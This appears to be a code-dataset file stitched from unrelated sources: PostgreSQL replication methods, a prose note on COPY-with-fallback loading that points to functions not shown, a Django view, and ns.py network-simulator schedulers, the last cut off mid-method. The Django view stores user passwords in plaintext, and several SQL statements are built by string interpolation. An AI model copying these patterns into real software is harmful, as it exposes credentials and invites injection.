self.logger.error("STATEMENT: %s " % (self.pg_conn.pgsql_cur.mogrify(sql_validate)))
def reset_sequences(self, source_name):
"""
        The method resets the sequences to the max value available in the associated table.
:param source_name: the source name, required to determine the destination schema
"""
sql_schema="""
SELECT
t_dest_schema
FROM
sch_chameleon.t_sources
WHERE
t_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_schema, (source_name, ))
dschema=self.pg_conn.pgsql_cur.fetchone()
destination_schema = dschema[0]
self.logger.info("resetting the sequences in schema %s" % destination_schema)
sql_gen_reset="""
SELECT
format('SELECT setval(%%L::regclass,(select max(%%I) FROM %%I.%%I));',
replace(replace(column_default,'nextval(''',''),'''::regclass)',''),
column_name,
table_schema,
table_name
),
replace(replace(column_default,'nextval(''',''),'''::regclass)','') as seq_name
FROM
information_schema.columns
WHERE
table_schema=%s
AND column_default like 'nextval%%'
;"""
self.pg_conn.pgsql_cur.execute(sql_gen_reset, (destination_schema, ))
results=self.pg_conn.pgsql_cur.fetchall()
try:
for statement in results:
self.logger.info("resetting the sequence %s" % statement[1])
self.pg_conn.pgsql_cur.execute(statement[0])
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(statement)
except:
pass
def generate_default_statements(self, table, column, create_column=None):
"""
The method gets the default value associated with the table and column removing the cast.
:param table: The table name
        :param column: The column name
:return: the statements for dropping and creating default value on the affected table
:rtype: dictionary
"""
if not create_column:
create_column = column
regclass = """ "%s"."%s" """ %(self.dest_schema, table)
sql_def_val = """
SELECT
(
SELECT
split_part(substring(pg_catalog.pg_get_expr(d.adbin, d.adrelid) for 128),'::',1)
FROM
pg_catalog.pg_attrdef d
WHERE
d.adrelid = a.attrelid
AND d.adnum = a.attnum
AND a.atthasdef
) as default_value
FROM
pg_catalog.pg_attribute a
WHERE
a.attrelid = %s::regclass
AND a.attname=%s
AND NOT a.attisdropped
;
"""
self.pg_conn.pgsql_cur.execute(sql_def_val, (regclass, column ))
default_value = self.pg_conn.pgsql_cur.fetchone()
if default_value[0]:
query_drop_default = """ ALTER TABLE "%s" ALTER COLUMN "%s" DROP DEFAULT;""" % (table, column)
query_add_default = """ ALTER TABLE "%s" ALTER COLUMN "%s" SET DEFAULT %s ; """ % (table, create_column, default_value[0])
else:
query_drop_default = ""
query_add_default = ""
return {'drop':query_drop_default, 'create':query_add_default}
def build_enum_ddl(self, enm_dic):
"""
The method builds the enum DDL using the token data.
The postgresql system catalog is queried to determine whether the enum exists and needs to be altered.
        The alter is not written in the replica log table but executed as a single statement,
        as PostgreSQL does not allow the alter to be part of a multi-command SQL.
:param enm_dic: a dictionary with the enumeration details
:return: a dictionary with the pre_alter and post_alter statements (e.g. pre alter create type , post alter drop type)
:rtype: dictionary
"""
#enm_dic = {'table':table_name, 'column':column_name, 'type':column_type, 'enum_list': enum_list}
enum_name="enum_%s_%s" % (enm_dic['table'], enm_dic['column'])
sql_check_enum = """
SELECT
typ.typcategory,
typ.typname,
sch_typ.nspname as typschema,
CASE
WHEN typ.typcategory='E'
THEN
(
SELECT
array_agg(enumlabel)
FROM
pg_enum
WHERE
enumtypid=typ.oid
)
END enum_list
FROM
pg_type typ
INNER JOIN pg_namespace sch_typ
ON sch_typ.oid = typ.typnamespace
WHERE
sch_typ.nspname=%s
AND typ.typname=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_check_enum, (self.dest_schema, enum_name))
type_data=self.pg_conn.pgsql_cur.fetchone()
return_dic = {}
pre_alter = ""
post_alter = ""
column_type = enm_dic["type"]
self.logger.debug(enm_dic)
if type_data:
if type_data[0] == 'E' and enm_dic["type"] == 'enum':
                self.logger.debug('There is already the enum %s, altering the type' % enum_name)
new_enums = [val.strip() for val in enm_dic["enum_list"] if val.strip() not in type_data[3]]
sql_add = []
for enumeration in new_enums:
sql_add = """ALTER TYPE "%s"."%s" ADD VALUE '%s';""" % (type_data[2], enum_name, enumeration)
self.pg_conn.pgsql_cur.execute(sql_add)
column_type = enum_name
elif type_data[0] != 'E' and enm_dic["type"] == 'enum':
self.logger.debug('The column will be altered in enum, creating the type')
pre_alter = "CREATE TYPE \"%s\" AS ENUM (%s);" % (enum_name, enm_dic["enum_elements"])
column_type = enum_name
elif type_data[0] == 'E' and enm_dic["type"] != 'enum':
self.logger.debug('The column is no longer an enum, dropping the type')
post_alter = "DROP TYPE \"%s\" " % (enum_name)
elif not type_data and enm_dic["type"] == 'enum':
self.logger.debug('Creating a new enumeration type %s' % (enum_name))
pre_alter = "CREATE TYPE \"%s\" AS ENUM (%s);" % (enum_name, enm_dic["enum_elements"])
column_type = enum_name
return_dic["column_type"] = column_type
return_dic["pre_alter"] = pre_alter
return_dic["post_alter"] = post_alter
return return_dic
def build_alter_table(self, token):
"""
The method builds the alter table statement from the token data.
The function currently supports the following statements.
DROP TABLE
ADD COLUMN
CHANGE
MODIFY
        The CHANGE and MODIFY commands are potential sources of breakage for the replica because of
        the mysql implicit fallback data types.
For better understanding please have a look to
http://www.cybertec.at/why-favor-postgresql-over-mariadb-mysql/
:param token: A dictionary with the tokenised sql statement
:return: query the DDL query in the PostgreSQL dialect
:rtype: string
"""
alter_cmd = []
ddl_enum = []
ddl_pre_alter = []
ddl_post_alter = []
query_cmd=token["command"]
table_name=token["name"]
for alter_dic in token["alter_cmd"]:
if alter_dic["command"] == 'DROP':
alter_cmd.append("%(command)s %(name)s CASCADE" % alter_dic)
elif alter_dic["command"] == 'ADD':
column_type = self.type_dictionary[alter_dic["type"]]
column_name = alter_dic["name"]
enum_list = str(alter_dic["dimension"]).replace("'", "").split(",")
enm_dic = {'table':table_name, 'column':column_name, 'type':column_type, 'enum_list': enum_list, 'enum_elements':alter_dic["dimension"]}
enm_alter = self.build_enum_ddl(enm_dic)
ddl_pre_alter.append(enm_alter["pre_alter"])
ddl_post_alter.append(enm_alter["post_alter"])
column_type= enm_alter["column_type"]
if column_type in ["character varying", "character", 'numeric', 'bit', 'float']:
column_type=column_type+"("+str(alter_dic["dimension"])+")"
if alter_dic["default"]:
default_value = "DEFAULT %s" % alter_dic["default"]
else:
default_value=""
alter_cmd.append("%s \"%s\" %s NULL %s" % (alter_dic["command"], column_name, column_type, default_value))
elif alter_dic["command"] == 'CHANGE':
sql_rename = ""
sql_type = ""
old_column=alter_dic["old"]
new_column=alter_dic["new"]
column_name = old_column
enum_list = str(alter_dic["dimension"]).replace("'", "").split(",")
column_type=self.type_dictionary[alter_dic["type"]]
default_sql = self.generate_default_statements(table_name, old_column, new_column)
enm_dic = {'table':table_name, 'column':column_name, 'type':column_type, 'enum_list': enum_list, 'enum_elements':alter_dic["dimension"]}
enm_alter = self.build_enum_ddl(enm_dic)
ddl_pre_alter.append(enm_alter["pre_alter"])
ddl_pre_alter.append(default_sql["drop"])
ddl_post_alter.append(enm_alter["post_alter"])
ddl_post_alter.append(default_sql["create"])
column_type= enm_alter["column_type"]
if column_type=="character varying" or column_type=="character" or column_type=='numeric' or column_type=='bit' or column_type=='float':
column_type=column_type+"("+str(alter_dic["dimension"])+")"
sql_type = """ALTER TABLE "%s" ALTER COLUMN "%s" SET DATA TYPE %s USING "%s"::%s ;;""" % (table_name, old_column, column_type, old_column, column_type)
if old_column != new_column:
sql_rename="""ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s" ;""" % (table_name, old_column, new_column)
query = ' '.join(ddl_pre_alter)
query += sql_type+sql_rename
query += ' '.join(ddl_post_alter)
return query
elif alter_dic["command"] == 'MODIFY':
column_type = self.type_dictionary[alter_dic["type"]]
column_name = alter_dic["name"]
enum_list = str(alter_dic["dimension"]).replace("'", "").split(",")
default_sql = self.generate_default_statements(table_name, column_name)
enm_dic = {'table':table_name, 'column':column_name, 'type':column_type, 'enum_list': enum_list, 'enum_elements':alter_dic["dimension"]}
enm_alter = self.build_enum_ddl(enm_dic)
ddl_pre_alter.append(enm_alter["pre_alter"])
ddl_pre_alter.append(default_sql["drop"])
ddl_post_alter.append(enm_alter["post_alter"])
ddl_post_alter.append(default_sql["create"])
column_type= enm_alter["column_type"]
if column_type=="character varying" or column_type=="character" or column_type=='numeric' or column_type=='bit' or column_type=='float':
column_type=column_type+"("+str(alter_dic["dimension"])+")"
query = ' '.join(ddl_pre_alter)
query += """ALTER TABLE "%s" ALTER COLUMN "%s" SET DATA TYPE %s USING "%s"::%s ;""" % (table_name, column_name, column_type, column_name, column_type)
query += ' '.join(ddl_post_alter)
return query
query = ' '.join(ddl_pre_alter)
query += query_cmd + ' '+ table_name+ ' ' +', '.join(alter_cmd)+" ;"
query += ' '.join(ddl_post_alter)
return query
def truncate_tables(self):
"""
        The method truncates the tables listed in t_index_def. In order to minimise the risk of a lock chain
        the truncate is prepended by a SET lock_timeout = '10s'. If the lock is not acquired in that time
        the procedure falls back to a delete and vacuum.
"""
sql_clean="""
SELECT DISTINCT
format('SET lock_timeout=''10s'';TRUNCATE TABLE %%I.%%I CASCADE;',v_schema,v_table) v_truncate,
format('DELETE FROM %%I.%%I;',v_schema,v_table) v_delete,
format('VACUUM %%I.%%I;',v_schema,v_table) v_vacuum,
format('%%I.%%I',v_schema,v_table) as v_tab,
v_table
FROM
sch_chameleon.t_index_def
WHERE
i_id_source=%s
ORDER BY
v_table
;
"""
self.pg_conn.pgsql_cur.execute(sql_clean, (self.i_id_source, ))
tab_clean=self.pg_conn.pgsql_cur.fetchall()
for stat_clean in tab_clean:
st_truncate=stat_clean[0]
st_delete=stat_clean[1]
st_vacuum=stat_clean[2]
tab_name=stat_clean[3]
try:
self.logger.info("truncating table %s" % (tab_name,))
self.pg_conn.pgsql_cur.execute(st_truncate)
except:
self.logger.info("truncate failed, fallback to delete on table %s" % (tab_name,))
self.pg_conn.pgsql_cur.execute(st_delete)
self.logger.info("running vacuum on table %s" % (tab_name,))
self.pg_conn.pgsql_cur.execute(st_vacuum)
def drop_src_indices(self):
"""
The method executes the index drop statements read from the table t_index_def.
The method is used when resyncing the replica for removing the indices before the bulk load.
"""
sql_idx="""
SELECT
t_drop
FROM
sch_chameleon.t_index_def
WHERE
i_id_source=%s;
"""
self.pg_conn.pgsql_cur.execute(sql_idx, (self.i_id_source, ))
idx_drop=self.pg_conn.pgsql_cur.fetchall()
for drop_stat in idx_drop:
self.pg_conn.pgsql_cur.execute(drop_stat[0])
def create_src_indices(self):
"""
The method executes the index DDL read from the table t_index_def.
The method is used when resyncing the replica for recreating the indices after the bulk load.
"""
sql_idx="""
SELECT
t_create
FROM
sch_chameleon.t_index_def
WHERE
i_id_source=%s;
"""
self.pg_conn.pgsql_cur.execute(sql_idx, (self.i_id_source, ))
idx_create=self.pg_conn.pgsql_cur.fetchall()
for create_stat in idx_create:
self.pg_conn.pgsql_cur.execute(create_stat[0])
def get_index_def(self):
"""
The method inserts in the table t_index_def the create and drop statements for the tables affected by
the resync replica.
"""
table_limit = ''
if self.table_limit[0] != '*':
table_limit = self.pg_conn.pgsql_cur.mogrify("""WHERE table_name IN (SELECT unnest(%s))""",(self.table_limit, )).decode()
sql_get_idx="""
DELETE FROM sch_chameleon.t_index_def WHERE i_id_source=%s;
INSERT INTO sch_chameleon.t_index_def
(
i_id_source,
v_schema,
v_table,
v_index,
t_create,
t_drop
)
SELECT
i_id_source,
schema_name,
table_name,
index_name,
CASE
WHEN indisprimary
THEN
format('ALTER TABLE %%I.%%I ADD CONSTRAINT %%I %%s',
schema_name,
table_name,
index_name,
pg_get_constraintdef(const_id)
)
ELSE
pg_get_indexdef(index_id)
END AS t_create,
CASE
WHEN indisprimary
THEN
format('ALTER TABLE %%I.%%I DROP CONSTRAINT %%I',
schema_name,
table_name,
index_name
)
ELSE
format('DROP INDEX %%I.%%I',
schema_name,
index_name
)
END AS t_drop
FROM
(
SELECT
tab.relname AS table_name,
indx.relname AS index_name,
idx.indexrelid index_id,
indisprimary,
sch.nspname schema_name,
src.i_id_source,
cns.oid as const_id
FROM
pg_index idx
INNER JOIN pg_class indx
ON
idx.indexrelid=indx.oid
INNER JOIN pg_class tab
INNER JOIN pg_namespace sch
ON
tab.relnamespace=sch.oid
ON
idx.indrelid=tab.oid
INNER JOIN sch_chameleon.t_sources src
ON sch.nspname=src.t_dest_schema
LEFT OUTER JOIN pg_constraint cns
ON
indx.relname=cns.conname
AND cns.connamespace=sch.oid
WHERE
sch.nspname=%s
) idx
""" + table_limit
self.pg_conn.pgsql_cur.execute(sql_get_idx, (self.i_id_source, self.dest_schema, ))
def drop_primary_key(self, token):
"""
The method drops the primary key for the table.
As tables without primary key cannot be replicated the method calls unregister_table
to remove the table from the replica set.
The drop constraint statement is not built from the token but generated from the information_schema.
:param token: the tokenised query for drop primary key
"""
self.logger.info("dropping primary key for table %s" % (token["name"],))
sql_gen="""
SELECT DISTINCT
format('ALTER TABLE %%I.%%I DROP CONSTRAINT %%I;',
table_schema,
table_name,
constraint_name
)
FROM
information_schema.key_column_usage
WHERE
table_schema=%s
AND table_name=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_gen, (self.dest_schema, token["name"]))
value_check=self.pg_conn.pgsql_cur.fetchone()
if value_check:
sql_drop=value_check[0]
self.pg_conn.pgsql_cur.execute(sql_drop)
self.unregister_table(token["name"])
def gen_query(self, token):
"""
The method builds the DDL using the tokenised SQL stored in token.
The supported commands are
DROP TABLE
TRUNCATE
CREATE TABLE
ALTER TABLE
DROP PRIMARY KEY
:param token: A dictionary with the tokenised sql statement
:return: query the DDL query in the PostgreSQL dialect
:rtype: string
"""
query=""
if token["command"] =="DROP TABLE":
query=" %(command)s IF EXISTS \"%(name)s\";" % token
elif token["command"] =="TRUNCATE":
query=" %(command)s TABLE \"%(name)s\" CASCADE;" % token
elif token["command"] =="CREATE TABLE":
table_metadata={}
table_metadata["columns"]=token["columns"]
table_metadata["name"]=token["name"]
table_metadata["indices"]=token["indices"]
self.table_metadata={}
self.table_metadata[token["name"]]=table_metadata
self.build_tab_ddl()
self.build_idx_ddl()
query_type=' '.join(self.type_ddl[token["name"]])
query_table=self.table_ddl[token["name"]]
query_idx=' '.join(self.idx_ddl[token["name"]])
query=query_type+query_table+query_idx
self.store_table(token["name"])
elif token["command"] == "ALTER TABLE":
query=self.build_alter_table(token)
elif token["command"] == "DROP PRIMARY KEY":
self.drop_primary_key(token)
return query
def write_ddl(self, token, query_data):
"""
The method writes the DDL built from the tokenised sql into PostgreSQL.
:param token: the tokenised query
:param query_data: query's metadata (schema,binlog, etc.)
"""
sql_path=" SET search_path="+self.dest_schema+";"
pg_ddl=sql_path+self.gen_query(token)
log_table=query_data["log_table"]
insert_vals=( query_data["batch_id"],
token["name"],
query_data["schema"],
query_data["binlog"],
query_data["logpos"],
pg_ddl
)
sql_insert="""
INSERT INTO sch_chameleon."""+log_table+"""
(
i_id_batch,
v_table_name,
v_schema_name,
enm_binlog_event,
t_binlog_name,
i_binlog_position,
t_query
)
VALUES
(
%s,
%s,
%s,
'ddl',
%s,
%s,
%s
)
;
"""
self.pg_conn.pgsql_cur.execute(sql_insert, insert_vals)
def check_reindex(self):
"""
        The method checks whether any reindex is running and, if so, waits for the configured number of seconds before checking again.
"""
sql_check="""
SELECT
count(*)
FROM
pg_stat_activity
WHERE
datname=current_database()
AND application_name = ANY(%s) ;
"""
while True:
self.pg_conn.pgsql_cur.execute(sql_check, (self.reindex_app_names, ))
reindex_tup = self.pg_conn.pgsql_cur.fetchone()
reindex_cnt = reindex_tup[0]
if reindex_cnt == 0:
                break
self.logger.info("reindex detected, sleeping %s second(s)" % (self.sleep_on_reindex,))
time.sleep(self.sleep_on_reindex)
def set_consistent_table(self, table):
"""
        The method sets to NULL the binlog name and position for the given table.
When the table is marked consistent the read replica loop reads and saves the table's row images.
:param table: the table name
"""
sql_set = """
UPDATE sch_chameleon.t_replica_tables
SET
t_binlog_name = NULL,
i_binlog_position = NULL
WHERE
i_id_source = %s
AND v_table_name = %s
AND v_schema_name = %s
;
"""
self.pg_conn.pgsql_cur.execute(sql_set, (self.i_id_source, table, self.dest_schema))
def get_inconsistent_tables(self):
"""
        The method collects the tables in an inconsistent state.
        The information is stored in a dictionary whose key is the table's name.
        The dictionary is used in the read replica loop to determine whether the table's modifications
        should be ignored because the table is in an inconsistent state.
:return: a dictionary with the tables in inconsistent state and their snapshot coordinates.
:rtype: dictionary
"""
sql_get = """
SELECT
v_schema_name,
v_table_name,
t_binlog_name,
i_binlog_position
FROM
sch_chameleon.t_replica_tables
WHERE
t_binlog_name IS NOT NULL
AND i_binlog_position IS NOT NULL
AND i_id_source = %s
;
"""
inc_dic = {}
self.pg_conn.pgsql_cur.execute(sql_get, (self.i_id_source, ))
inc_results = self.pg_conn.pgsql_cur.fetchall()
for table in inc_results:
tab_dic = {}
tab_dic["schema"] = table[0]
tab_dic["table"] = table[1]
tab_dic["log_seq"] = int(table[2].split('.')[1])
tab_dic["log_pos"] = int(table[3])
inc_dic[table[1]] = tab_dic
return inc_dic
def delete_table_events(self):
"""
        The method removes the events from the log table for a specific table and source.
        It is used to clean up any residual event for a synced table in the replica_engine's sync_table method.
"""
sql_clean = """
DELETE FROM sch_chameleon.t_log_replica
WHERE
i_id_event IN (
SELECT
log.i_id_event
FROM
sch_chameleon.t_replica_batch bat
INNER JOIN sch_chameleon.t_log_replica log
ON log.i_id_batch=bat.i_id_batch
WHERE
log.v_table_name=ANY(%s)
AND bat.i_id_source=%s
)
;
"""
self.pg_conn.pgsql_cur.execute(sql_clean, (self.table_limit, self.i_id_source, ))
``` |
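The write_batch / insert_batch pair above follows a common bulk-loading pattern: push the whole batch with COPY and, if the COPY fails, replay the rows one by one so a single bad row cannot sink the batch. The sketch below reproduces that pattern in isolation with psycopg2; the DSN, table and column names are hypothetical placeholders, and it is only a minimal illustration of the fallback logic, not the project's actual code.
```python
# Minimal sketch of the COPY-with-fallback pattern used by write_batch/insert_batch.
# The DSN, table name and columns are hypothetical placeholders.
import io
import psycopg2

def bulk_load(rows, dsn="dbname=demo user=demo"):
    conn = psycopg2.connect(dsn)
    cur = conn.cursor()
    # Build an in-memory CSV from the mogrified rows, mirroring write_batch.
    csv_file = io.StringIO()
    csv_file.write("\n".join(
        cur.mogrify("%s,%s", (row["id"], row["payload"])).decode() for row in rows))
    csv_file.seek(0)
    try:
        cur.copy_expert("COPY demo_events (i_id, t_payload) FROM STDIN CSV QUOTE ''''", csv_file)
        conn.commit()
    except psycopg2.Error:
        conn.rollback()
        # Fallback: insert each row individually and discard only the problematic ones.
        for row in rows:
            try:
                cur.execute(
                    "INSERT INTO demo_events (i_id, t_payload) VALUES (%s, %s)",
                    (row["id"], row["payload"]))
                conn.commit()
            except psycopg2.Error:
                conn.rollback()
```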
{
"source": "jinjinanan/HelloDjango1",
"score": 2
} |
#### File: HelloDjango1/app1/views.py
```python
from django.shortcuts import render
from app1 import models
# Create your views here.
from django.shortcuts import HttpResponse
user_list = [
{'user':'jack','pwd':'<PASSWORD>'},
{'user':'tom','pwd':'<PASSWORD>'},
]
def index(request):
# return HttpResponse('Hello world!')
if request.method == 'POST':
username = request.POST.get('username',None)
password = request.POST.get('password',None)
# temp = {'user':username,'pwd':password}
# user_list.append(temp)
models.UserInfo.objects.create(user=username,pwd=password)
user_list = models.UserInfo.objects.all()
return render(request,'index.html',{'data':user_list})
``` |
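The Django view above calls models.UserInfo.objects.create(user=..., pwd=...) and models.UserInfo.objects.all(), so it presumes a UserInfo model with user and pwd fields. A minimal model consistent with those calls might look like the sketch below; the actual models.py is not shown here, so the field types and lengths are assumptions.
```python
# Hypothetical app1/models.py matching the calls made by the view above.
# Field names follow the view; CharField lengths are assumptions.
from django.db import models

class UserInfo(models.Model):
    user = models.CharField(max_length=64)
    pwd = models.CharField(max_length=64)
```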
{
"source": "JinJinGuang/ns.py",
"score": 3
} |
#### File: ns.py/examples/two_level_sp.py
```python
import simpy
from ns.packet.dist_generator import DistPacketGenerator
from ns.packet.sink import PacketSink
from ns.port.port import Port
from ns.scheduler.sp import SPServer
def packet_arrival():
return 1
def const_size():
return 1000.0
env = simpy.Environment()
total_groups = 2
total_flows_per_group = 3
source_rate = 8.0 * const_size() / packet_arrival()
service_rate_L1 = 2 * total_groups * total_flows_per_group * source_rate
service_rate_L2 = 2 * total_flows_per_group * source_rate
group_weights = {}
drr_server_per_group = {}
for grp_id in range(total_groups):
for flow_id in range(total_flows_per_group):
group_weights[f'grp_{grp_id}_flow_{flow_id}'] = (grp_id +
1) * 3 + flow_id * 2
ps = PacketSink(env)
drr_server = SPServer(env,
service_rate_L1,
group_weights,
zero_buffer=True,
debug=False)
drr_server.out = ps
# Setting up the DRR server for each group
for grp_id in range(total_groups):
flow_weights = {}
for flow_id in range(total_flows_per_group):
flow_weights[f'grp_{grp_id}_flow_{flow_id}'] = (grp_id +
1) * 3 + flow_id * 2
drr_server_per_group[f'grp_{grp_id}'] = SPServer(
env,
service_rate_L2,
flow_weights,
zero_buffer=True,
zero_downstream_buffer=True,
debug=True)
for flow_id in range(total_flows_per_group):
pg = DistPacketGenerator(env,
f"grp_{grp_id}_flow_{flow_id}",
packet_arrival,
const_size,
initial_delay=0.0,
finish=3,
flow_id=f"grp_{grp_id}_flow_{flow_id}",
debug=True)
tail_drop_buffer = Port(env,
source_rate,
qlimit=None,
zero_downstream_buffer=True,
debug=True)
pg.out = tail_drop_buffer
tail_drop_buffer.out = drr_server_per_group[f'grp_{grp_id}']
drr_server_per_group[f'grp_{grp_id}'].out = drr_server
env.run(until=100)
for grp_id in range(total_groups):
for flow_id in range(total_flows_per_group):
print(
f"At the packet sink, packet arrival times for group {grp_id} and flow {flow_id} are:"
)
print(ps.arrivals[f'grp_{grp_id}_flow_{flow_id}'])
```
#### File: ns/scheduler/virtual_clock.py
```python
from collections import defaultdict as dd
from ns.packet.packet import Packet
from ns.utils import taggedstore
class VirtualClockServer:
""" Implements a virtual clock server.
Parameters
----------
env: simpy.Environment
The simulation environment.
rate: float
The bit rate of the port.
vticks: dict
This can be either a list or a dictionary. If it is a list, it uses the flow_id
as its index to look for the flow's corresponding 'vtick'. If it is a dictionary,
it contains (flow_id -> vtick) pairs for each possible flow_id. We assume
that the vticks are the inverse of the desired rates for the corresponding flows,
in bits per second.
zero_buffer: bool
Does this server have a zero-length buffer? This is useful when multiple
basic elements need to be put together to construct a more complex element
with a unified buffer.
zero_downstream_buffer: bool
        Does this server's downstream element have a zero-length buffer? If so, packets
may queue up in this element's own buffer rather than be forwarded to the
next-hop element.
debug: bool
If True, prints more verbose debug information.
"""
def __init__(self,
env,
rate,
vticks,
zero_buffer=False,
zero_downstream_buffer=False,
debug=False):
self.env = env
self.rate = rate
self.vticks = vticks
if isinstance(self.vticks, list):
self.aux_vc = [0.0 for __ in range(len(vticks))]
self.v_clocks = [0.0 for __ in range(len(vticks))]
# Keep track of the number of packets from each flow in the queue
self.flow_queue_count = [0 for __ in range(len(vticks))]
elif isinstance(self.vticks, dict):
self.aux_vc = {key: 0.0 for (key, __) in vticks.items()}
self.v_clocks = {key: 0.0 for (key, __) in vticks.items()}
self.flow_queue_count = {key: 0 for (key, __) in vticks.items()}
else:
raise ValueError('vticks must be either a list or a dictionary.')
self.out = None
self.packets_received = 0
self.packets_dropped = 0
self.debug = debug
self.current_packet = None
self.byte_sizes = dd(lambda: 0)
self.upstream_updates = {}
self.upstream_stores = {}
self.zero_buffer = zero_buffer
self.zero_downstream_buffer = zero_downstream_buffer
if self.zero_downstream_buffer:
self.downstream_store = taggedstore.TaggedStore(env)
self.store = taggedstore.TaggedStore(env)
self.action = env.process(self.run())
def packet_in_service(self) -> Packet:
"""
Returns the packet that is currently being sent to the downstream element.
Used by a ServerMonitor.
"""
return self.current_packet
def byte_size(self, flow_id) -> int:
"""
Returns the size of the queue for a particular flow_id, in bytes.
Used by a ServerMonitor.
"""
if flow_id in self.byte_sizes:
return self.byte_sizes[flow_id]
return 0
def size(self, flow_id) -> int:
"""
Returns the size of the queue for a particular flow_id, in the
number of packets. Used by a ServerMonitor.
"""
return self.flow_queue_count[flow_id]
def all_flows(self) -> list:
"""
Returns a list containing all the flow IDs.
"""
        return list(self.byte_sizes.keys())
def update(self, packet):
"""The packet has just been retrieved from this element's own buffer, so
update internal housekeeping states accordingly.
"""
if self.zero_buffer:
self.upstream_stores[packet].get()
del self.upstream_stores[packet]
self.upstream_updates[packet](packet)
del self.upstream_updates[packet]
flow_id = packet.flow_id
self.flow_queue_count[flow_id] -= 1
if self.debug:
print(f"Sent Packet {packet.packet_id} from flow {flow_id}")
if flow_id in self.byte_sizes:
self.byte_sizes[flow_id] -= packet.size
else:
raise ValueError("Error: the packet is from an unrecorded flow.")
def run(self):
"""The generator function used in simulations."""
while True:
if self.zero_downstream_buffer:
packet = yield self.downstream_store.get()
self.current_packet = packet
yield self.env.timeout(packet.size * 8.0 / self.rate)
self.out.put(packet,
upstream_update=self.update,
upstream_store=self.store)
self.current_packet = None
else:
packet = yield self.store.get()
self.update(packet)
self.current_packet = packet
yield self.env.timeout(packet.size * 8.0 / self.rate)
self.out.put(packet)
self.current_packet = None
def put(self, packet, upstream_update=None, upstream_store=None):
""" Sends a packet to this element. """
self.packets_received += 1
self.byte_sizes[packet.flow_id] += packet.size
now = self.env.now
flow_id = packet.flow_id
self.flow_queue_count[flow_id] += 1
if self.v_clocks[flow_id] == 0:
# Upon receiving the first packet from this flow_id, set its
# virtual clock to the current real time
self.v_clocks[flow_id] = now
# Update virtual clocks (vc) for the corresponding flow. We assume
# that vticks is the desired bit time, i.e., the inverse of the
# desired bits per second data rate. Hence, we multiply this
# value by the size of the packet in bits.
self.aux_vc[flow_id] = max(now, self.aux_vc[flow_id])
self.v_clocks[flow_id] = self.v_clocks[
flow_id] + self.vticks[flow_id] * packet.size * 8.0
self.aux_vc[flow_id] += self.vticks[flow_id]
# Lots of work to do here to implement the queueing discipline
if self.debug:
print(
f"Packet arrived at {self.env.now}, with flow_id {flow_id}, "
f"packet_id {packet.packet_id}, virtual clocks {self.v_clocks[flow_id]}, "
f"aux_vc {self.aux_vc[flow_id]}")
if self.zero_buffer and upstream_update is not None and upstream_store is not None:
self.upstream_stores[packet] = upstream_store
self.upstream_updates[packet] = upstream_update
if self.zero_downstream_buffer:
self.downstream_store.put((self.aux_vc[flow_id], packet))
return self.store.put((self.aux_vc[flow_id], packet))
```
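For a quick way to exercise VirtualClockServer, the pattern from the two_level_sp.py example earlier in this document carries over: generators feed the server, the server feeds a sink, and vticks holds the inverse of each flow's desired bit rate. The flow names, rates and packet sizes below are illustrative values only.
```python
# Minimal sketch: two constant-rate flows through a VirtualClockServer (illustrative values).
import simpy
from ns.packet.dist_generator import DistPacketGenerator
from ns.packet.sink import PacketSink
from ns.scheduler.virtual_clock import VirtualClockServer

def packet_arrival():
    return 1.0        # one packet per time unit

def packet_size():
    return 100.0      # bytes

env = simpy.Environment()
source_rate = 8.0 * packet_size() / packet_arrival()   # bits per second per flow
# vticks: inverse of the desired per-flow rates, in seconds per bit.
vticks = {"flow_1": 1.0 / source_rate, "flow_2": 1.0 / (2 * source_rate)}

server = VirtualClockServer(env, rate=4 * source_rate, vticks=vticks, debug=True)
sink = PacketSink(env)
server.out = sink

for flow_id in vticks:
    pg = DistPacketGenerator(env, flow_id, packet_arrival, packet_size,
                             flow_id=flow_id, debug=False)
    pg.out = server

env.run(until=20)
print(sink.arrivals["flow_1"], sink.arrivals["flow_2"])
```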
#### File: ns/shaper/token_bucket.py
```python
import simpy
class TokenBucketShaper:
""" The token bucket size should be greater than the size of the largest packet that
can occur on input. If this is not the case we always accumulate enough tokens to let
the current packet pass based on the average rate. This may not be the behavior you desire.
Parameters
----------
env: simpy.Environment
The simulation environment.
rate: int
The token arrival rate in bits.
bucket_size: int
The token bucket size in bytes.
peak: int (or None for an infinite peak sending rate)
The peak sending rate in bits of the buffer (quickest time two packets could be sent).
zero_buffer: bool
Does this server have a zero-length buffer? This is useful when multiple
basic elements need to be put together to construct a more complex element
with a unified buffer.
zero_downstream_buffer: bool
        Does this server's downstream element have a zero-length buffer? If so, packets
may queue up in this element's own buffer rather than be forwarded to the
next-hop element.
debug: bool
If True, prints more verbose debug information.
"""
def __init__(self,
env,
rate,
bucket_size,
peak=None,
zero_buffer=False,
zero_downstream_buffer=False,
debug=False):
self.store = simpy.Store(env)
self.env = env
self.rate = rate
self.out = None
self.packets_received = 0
self.packets_sent = 0
self.bucket_size = bucket_size
self.peak = peak
self.upstream_updates = {}
self.upstream_stores = {}
self.zero_buffer = zero_buffer
self.zero_downstream_buffer = zero_downstream_buffer
if self.zero_downstream_buffer:
self.downstream_stores = simpy.Store(env)
self.current_bucket = bucket_size # Current size of the bucket in bytes
self.update_time = 0.0 # Last time the bucket was updated
self.debug = debug
self.busy = 0 # Used to track if a packet is currently being sent
self.action = env.process(self.run())
def update(self, packet):
"""The packet has just been retrieved from this element's own buffer, so
update internal housekeeping states accordingly."""
if self.zero_buffer:
self.upstream_stores[packet].get()
del self.upstream_stores[packet]
self.upstream_updates[packet](packet)
del self.upstream_updates[packet]
if self.debug:
print(
f"Sent packet {packet.packet_id} from flow {packet.flow_id}.")
def run(self):
"""The generator function used in simulations."""
while True:
if self.zero_downstream_buffer:
packet = yield self.downstream_stores.get()
else:
packet = yield self.store.get()
self.update(packet)
now = self.env.now
# Add tokens to the bucket based on the current time
self.current_bucket = min(
self.bucket_size, self.current_bucket + self.rate *
(now - self.update_time) / 8.0)
self.update_time = now
# Check if there are a sufficient number of tokens to allow the packet
# to be sent; if not, we will then wait to accumulate enough tokens to
# allow this packet to be sent regardless of the bucket size.
if packet.size > self.current_bucket: # needs to wait for the bucket to fill
yield self.env.timeout(
(packet.size - self.current_bucket) * 8.0 / self.rate)
self.current_bucket = 0.0
self.update_time = self.env.now
else:
